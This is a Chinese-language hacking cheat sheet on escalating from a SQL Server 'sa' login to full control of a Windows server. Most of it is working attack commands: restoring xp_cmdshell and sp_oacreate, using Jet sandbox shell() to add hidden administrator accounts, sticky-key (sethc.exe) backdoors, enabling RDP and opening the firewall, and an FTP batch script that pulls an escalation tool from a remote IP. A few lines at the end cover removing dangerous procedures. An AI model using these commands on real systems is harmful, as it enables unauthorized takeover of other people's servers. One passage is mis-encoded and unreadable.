net net1被禁止时执行CMD命令
net user Administrator$ 920517 /add
net localgroup administrators Administrator$ /add
第一步:dir net.exe /s /p 或者 dir net1.exe /s /p
第二步:C:/WINDOWS/system32/dllcache/net1.exe user 123 123 /add
第三步:C:/WINDOWS/system32/dllcache/net1.exe localgroup administrators 123 /add
沙盘模式提权
sethc.exe禁止
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("cacls c:/windows/system32/net.exe /e /t /g everyone:F')
net net1都被禁用
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("xcopy taskmgr.exe sethc.exe /y")')
如果cmd被禁用
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("net user user pass /add")')
除了xplog70.dll其他的都可以用这命令修复
第一步先删除:
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'
服务器: 消息 3701,级别 11,状态 5,行 1
无法 除去 过程 'sp_addextendedproc',因为它在系统目录中不存在。
服务器: 消息 3701,级别 11,状态 5,过程 sp_dropextendedproc,行 18
无法 除去 过程 'xp_cmdshell',因为它在系统目录中不存在。
第二步恢复:
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
直接恢复,不管sp_addextendedproc是不是存在
1.未能找到存储过程'master..xpcmdshell'之解决方法:
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
sp_addextendedproc 'xp_cmdshell','xpsql70.dll'
恢复sp_addextendedproc语句:
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call */
@dllname varchar(255)/* name of DLL containing function */
as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一DLL。原因126(找不到指定模块。)
恢复方法:查询分离器连接后,
sp_dropextendedproc "xp_cmdshell"
sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
修复XPLOG70.DLL(先用文件查看下备份的目录下/x86/bin,然后把下面目录替换)
第一步
exec sp_dropextendedproc 'xp_cmdshell'
第二步
dbcc addextendedproc ("xp_cmdshell","c:/sql2ksp4/x86/binn/xplog70.dll")
126 错误
修复XPLOG70.DLL(先用文件查看下备份的目录下/x86/bin,然后把下面目录替换)
第一步
exec sp_dropextendedproc 'xp_cmdshell'
第二步
dbcc addextendedproc ("xp_cmdshell","c:/sql2ksp4/x86/binn/xplog70.dll")
127 错误
exec sp_dropextendedproc 'xp_cmdshell'
exec sp_addextendedproc 'xp_cmdshell','c:/Program Files/Microsoft SQL Server/MSSQL/Binn/xplog70.dll'
dbcc addextendedproc ("xp_cmdshell","c:/Program Files/Microsoft SQL Server/MSSQL/Binn/xplog70.dll")
4.直接添加帐户法
删除odsole70.dll:
exec master..sp_dropextendedproc sp_oamethod
exec master..sp_dropextendedproc sp_oacreate
恢复odsole70.dll:
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
直接添加帐户命令:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:/windows/system32/cmd.exe /c net user sin sinhack /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:/windows/system32/cmd.exe/c net localgroup administrators sin /add'
FTP下载命令
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'C:/1.bat', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'open IP'
exec @ret = sp_oamethod @f, 'writeline', NULL,'ftp账号'
exec @ret = sp_oamethod @f, 'writeline', NULL,'ftp密码'
exec @ret = sp_oamethod @f, 'writeline', NULL,'get en.exe(无net提权脚本)c:/en.exe'
exec @ret = sp_oamethod @f, 'writeline', NULL,'bye'
3、net提权出现 拒绝访问错误5 (重点)
这种情况就不用尝试net1了,可以试试copy shift后门,如果copy后提示复制0文件,证明没有成功。那么可以试试能不能上传,如果能上传直接传个前段时间出来的无net提权工具,然后加个用户就可以了。但是这种情况大部分都是不能上传的,那么就要考虑一下了。既然能执行cmd,那么就能通过cmd下ftp下载文件,可是ftp前提是要能写进文本或批处理。那么就可以通过sql语句写进一个文本或批处理啊。
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'C:/1.bat', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'open IP'
exec @ret = sp_oamethod @f, 'writeline', NULL,'ftp账号'
exec @ret = sp_oamethod @f, 'writeline', NULL,'ftp密码'
exec @ret = sp_oamethod @f, 'writeline', NULL,'get en.exe(无net提权脚本)c:/en.exe'
exec @ret = sp_oamethod @f, 'writeline', NULL,'bye'
查询分析器执行成功后,不出意外,会在c盘出现一个1.bat(如果执行成功了,c盘却没有,可以换个文件夹写入,因为哪个服务器c盘根目录禁止写入)
然后cmd执行ftp -s:c:/1.bat
这个执行完了以后,就会在c盘ftp下载一个无net提权脚本 或者直接写个vbs提权脚本
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:/1.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set o=CreateObject( "Shell.Users" )'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set z=o.create("用户")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'z.changePassword "密码",""'
exec @ret = sp_oamethod @f, 'writeline', NULL,'z.setting("AccountType")=3'
然后cmd执行cscript c:/1.vbs 就可以了
Cmd 命令开3389:
REG ADD HKLM/SYSTEM/CurrentControlSet/Control/Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
1.查询终端端口
REG query HKLM/SYSTEM/CurrentControlSet/Control/Terminal" "Server/WinStations/RDP-Tcp /v PortNumber
2.开启XP&2003终端服务
REG ADD HKLM/SYSTEM/CurrentControlSet/Control/Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
3.更改终端端口为2008(0x7d8)默认为3389(0xD3D)
REG ADD HKLM/SYSTEM/CurrentControlSet/Control/Terminal" "Server/Wds/rdpwd/Tds/tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f
REG ADD HKLM/SYSTEM/CurrentControlSet/Control/Terminal" "Server/WinStations/RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f
4.取消xp&2003系统防火墙对终端服务的限制及IP连接的限制
REG ADD HKLM/SYSTEM/CurrentControlSet/Services/SharedAccess/Parameters/FirewallPolicy/StandardProfile/GloballyOpenPorts/List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
sql语句开3389
开3389:
exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM/CurrentControlSet/Control/Terminal Server','fDenyTSConnections','REG_DWORD',0;--
关3389:
exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM/CurrentControlSet/Control/Terminal Server','fDenyTSConnections','REG_DWORD',1;
查看3389端口
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp','PortNumber'
查看系统版本
type c:/boot.ini
普通CMD后门
xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/sethc.exe','debugger','reg_sz','c:/windows/system32/cmd.exe'
5下shift后门命令
declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:/windows/explorer.exe' ,'c:/windows/system32/sethc.exe';
declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:/windows/system32/sethc.exe' ,'c:/windows/system32/dllcache/sethc.exe';
copy c:/windows/explorer.exe c:/windows/system32/sethc.exe
copy c:/windows/system32/sethc.exe c:/windows/system32/dllcache/sethc.exe
5.恢复时一些常用的SQL语句:
利用sp_addextendedproc恢复大部分常用存储扩展(得先利用最顶上的语句恢复自己):
use master
exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll'
exec sp_addextendedproc xp_dirtree,'xpstar.dll'
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
exec sp_addextendedproc xp_regread,'xpstar.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
恢复cmdshell:
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
1.sql命令查询注册表粘滞键是否被劫持
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/sethc.exe','Debugger'
2.sql命令劫持注册表粘滞键功能,替换成任务管理器(当然你也可以替换成你想要的其他命令)
xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/sethc.exe',
'Debugger','REG_SZ','C:/WINDOWS/system32/taskmgr.exe'
3.sql命令删除注册表粘滞键的劫持功能保护你的服务器不再被他人利用
xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/sethc.exe'
SQL Server 阻止了对组件 'xp_cmdshell' 的 过程'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的详细信息,请参阅 SQL Server 联机丛书中的 "外围应用配置器"。
;EXEC sp_configure 'show advanced options', 1 --
;RECONFIGURE WITH OVERRIDE --
;EXEC sp_configure 'xp_cmdshell', 1 --
;RECONFIGURE WITH OVERRIDE --
;EXEC sp_configure 'show advanced options', 0 --
分析器执行的语句:
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
xpsql.cpp: 错误 5 来自 CreateProcess(第 737 行) 直接加帐号!
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare/Microsoft/Jet/4.0/Engines','SandBoxMode','REG_DWORD',0
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:/windows/system32/ias/ias.mdb','select shell("net user admin$ 920517 /add")');
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:/windows/system32/ias/ias.mdb','select shell("net localgroup administrators admin$ /add")');
恢复xp_cmdshell
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
sp_addextendedproc 'xp_cmdshell','xplog70.dll'
添加存储过程
sp_addextendedproc 'sp_oacreate','odsole70.dll
sp_addextendedproc 'xp_lake2', 'd:/wwwroot/caoo/wwwroot/xplake2.dll'
sp_dropextendedproc xp_lake2
加账号
EXEC xp_lake2 'net user > d:/wwwroot/caoo/wwwroot/1.txt'
EXEC xp_lake2 'net user admin$ admin /add'
EXEC xp_lake2 'net localgroup administrators admin$ /add'
3389 SHIFTSA沙盒模式提权-----
----------------------
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Jet/4.0/Engines','SandBoxMode','REG_DWORD',0;
-------------------------------------------------------
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:/windows/system32/ias/ias.mdb','select shell("net user sql$ 123 /add")');
-------------------------------------------------------
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:/windows/system32/ias/ias.mdb','select shell("net localgroup administrators sql$ /add")');
四.终极方法:
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
查询分离器连接后,
2000servser系统:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output
exec sp_oamethod @shell,'run',null,'c:/winnt/system32/cmd.exe /c net user 123 123 /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:/winnt/system32/cmd.exe /c net localgroup administrators 123 /add'
xp或2003server系统:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:/windows/system32/cmd.exe /c net user 123 123 /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:/windows/system32/cmd.exe /c net localgroup administrators 123 /add'
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Jet/4.0/Engines','SandBoxMode','REG_DWORD',1
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("cmd.exe /c net user admin 1234 /add")')
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("cmd.exe /c net localgroup administrators admin /add")')
declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:/windows/explorer.exe' ,'c:/windows/system32/sethc.exe';
declare @oo int
exec sp_oacreate 'scripting.filesystemobject', @oo out
exec sp_oamethod @oo, 'copyfile',null,'c:/windows/system32/sethc.exe' ,'c:/windows/system32/dllcache/sethc.exe';
sp_configure 'show advanced options', 1;
GO
RECONFIGURE;
GO
sp_configure 'Ole Automation Procedures', 1;
GO
RECONFIGURE;
GO
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:/windows/system32/cmd.exe /c net user'
执行SQL语句时发生错误!
错 误描述:SQL Server 阻止了对组件 'Ole Automation Procedures' 的 过程'sys.sp_OACreate' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 'Ole Automation Procedures'。有关启用 'Ole Automation Procedures' 的详细信息,请参阅 SQL Server 联机丛书中的 "外围应用配置器"。
exec master..sp_addextendedproc 'xp_cmdshell','xplog70.dll'--
成功。
再执行SQL语句
[Microsoft][ODBC SQL Server Driver][SQL Server]在执行 xp_cmdshell 的过程中出错。调用 'CreateProcess' 失败,错误代码: '5'。
解决方案:
遇到sql server 2005 ,恢复xp_cmdshell的办法
SQL Server 已封?元件 'xp_cmdshell' 的 程序 'sys.xp_cmdshell' 之存取,因?榇嗽??呀?由此伺服器的安全性??B??。系?管理?T可以使用 sp_configure ??⒂ 'xp_cmdshell' 的使用。如需有??⒂ 'xp_cmdshell' 的????,??㈤?《SQL Server ?上???分械模冀槊?^??B>(Surface Area Configuration)。
用下面一句话就可以了解决了。
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
关闭一样.只是将上面的后面的那个"1"改成"0"就可以了.
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE;
按照上面的方法试了一下,不行,很郁闷,无聊中就用下面命令查看注册表中的启动项目,然后在看,xp_cmdshell竟然恢复成功了.
Exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows/CurrentVersion/Run'
在获得SA密码后,往往因为服务器管理者或”前人”将net.exe和net1.exe被限制使用,无法添加管理员账号。我们知道VBS在活动目录(ADSI)部分有一个winnt对象,用来管理本地资源,利用它可以不依靠CMD等命令就能添加一个管理员,具体代码如下:
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os) '得到adsi接口,绑定
Set oe=GetObject(os&"/Administrators,group") '属性,admin组
Set od=ob.Create("user","test") '建立用户
od.SetPassword "1234" '设置密码
od.SetInfo '保存
Set of=GetObject(os&"/test",user) '得到用户
oe.add os&"/test"
将上面的代码保存为1.vbs,然后执行,命令为“cscript 1.vbs”,这样就会在系统添加一个系统名为test,密码为1234的用户。具体在查询分析器执行的代码如下:
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:/1.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject
("WSCRIPT.NETWORK")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork.
ComputerName'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject
(os&"/Administrators,group")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create
("user","test")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "1234"'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo '
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject
(os&"/test",user) '
exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/test"'
执行完上面的语句,再执行下面这行代码,这行代码一定单独执行,不要与上面的放在一起执行,否则会提示“c:/1.vbs正被另一个程序运行”而无法成功添加用户:
exec master..xp_cmdshell 'cscript c:/1.vbs'
如果系统用户没有添加成功,有可能是因为系统用户的密码1234的太简单,不符合服务器的复杂密码策略,可以考虑设置的复杂些,然后再测试一下。也可以使用echo将代码写到1.vbs中,代码格式为:
exec master..xp_cmdshell 'echo set wsnetwork=CreateObject("WSCRIPT.NETWORK")
>>1.vbs'
不过,不知道为什么所有带“&”字符的命令行都无法写入1.vbs,感兴趣的朋友可以尝试解决一下。
使用jet沙盘模式,可以解决XP_cmdshell等存储过程和相关动态链接库带来的烦恼。出于安全原因,系统默认情况下沙盘模式未开启,这就需要xp_regwrite开启沙盘模式:
Exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Jet/4.0
/Engines','SandBoxMode','REG_DWORD',1
然后执行沙盘命令,在系统添加一个用户名为test,密码为1234的用户:
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows
/system32/ias/ias.mdb','select shell("cmd.exe /c net user test 1234 /add")')
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows
/system32/ias/ias.mdb','select shell("cmd.exe /c net localgroup
administrators test /add")')
不同的操作系统,路径也不一样,需要根据情况做修改:
NT/2K: c:/winnt/system32/
XP/2003: c:/windows/system32/
另外Microsoft SQL Server2005在默认情况下,一些存储过程是关闭着的,需要命令打开:
开启XP_cmdshell:
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure
'xp_cmdshell', 1;RECONFIGURE;
开启'OPENROWSET':
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure
'Ad Hoc Distributed Queries',1;RECONFIGURE;
开启'sp_oacreate':
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure
'Ole Automation Procedures',1;RECONFIGURE;
错误:
SQL Server 阻止了对组件 'Ad Hoc Distributed Queries' 的 STATEMENT'OpenRowset/OpenDatasource' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 'Ad Hoc Distributed Queries'。有关启用 'Ad Hoc Distributed Queries' 的详细信息,请参阅 SQL Server 联机丛书中的 "外围应用配置器"。
分析:
Ad Hoc Distributed Queries 是advanced options ,因此必须先将'show advanced options',1,打开高级选项后才能对它进行设置。关闭时,也是先关Ad Hoc Distributed Queries 再关advanced options。
解决方案:
打开SqlServer2005,执行以下存储过程:代码如下:
启用Ad Hoc Distributed Queries:
exec sp_configure 'show advanced options',1
reconfigure
exec sp_configure 'Ad Hoc Distributed Queries',1
reconfigure
使用完成后,关闭Ad Hoc Distributed Queries:
exec sp_configure 'Ad Hoc Distributed Queries',0
reconfigure
exec sp_configure 'show advanced options',0
reconfigure
或者使用图形界面启动服务:
如图:
删除sql危险存储:
DROP PROCEDURE sp_makewebtask
exec master..sp_dropextendedproc xp_cmdshell
exec master..sp_dropextendedproc xp_dirtree
exec master..sp_dropextendedproc xp_fileexist
exec master..sp_dropextendedproc xp_terminate_process
exec master..sp_dropextendedproc sp_oamethod
exec master..sp_dropextendedproc sp_oacreate
exec master..sp_dropextendedproc xp_regaddmultistring
exec master..sp_dropextendedproc xp_regdeletekey
exec master..sp_dropextendedproc xp_regdeletevalue
exec master..sp_dropextendedproc xp_regenumkeys
exec master..sp_dropextendedproc xp_regenumvalues
exec master..sp_dropextendedproc sp_add_job
exec master..sp_dropextendedproc sp_addtask
exec master..sp_dropextendedproc xp_regread
exec master..sp_dropextendedproc xp_regwrite
exec master..sp_dropextendedproc xp_readwebtask
exec master..sp_dropextendedproc xp_makewebtask
exec master..sp_dropextendedproc xp_regremovemultistring
exec master..sp_dropextendedproc sp_OACreate
DROP PROCEDURE sp_addextendedproc
恢复扩展存储过程的办法
先恢复sp_addextendedproc,语句如下:
第一:
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call */ @dllname varchar(255)/* name of DLL containing function */ as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO
第二:
use master
exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll'
exec sp_addextendedproc xp_dirtree,'xpstar.dll'
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
exec sp_addextendedproc xp_regread,'xpstar.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'
恢复cmdshell的sql语句
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
开启cmdshell的sql语句
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
判断存储扩展是否存在
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
返回结果为1就ok
恢复xp_cmdshell
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
返回结果为1就ok
否则上传xplog7.0.dll
exec master.dbo.addextendedproc 'xp_cmdshell','c:/winnt/system32/xplog70.dll'
堵上cmdshell的sql语句
sp_dropextendedproc "xp_cmdshell
一.更改sa口令方法:
用sql综合利用工具连接后,执行命令:
exec sp_password NULL,'新密码','sa'
(提示:慎用!)
二.简单修补sa弱口令.
方法1:查询分离器连接后执行:
if exists (select * from
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
GO
方法2:查询分离器连接后
第一步执行:use master
第二步执行:sp_dropextendedproc 'xp_cmdshell'
然后按F5键命令执行完毕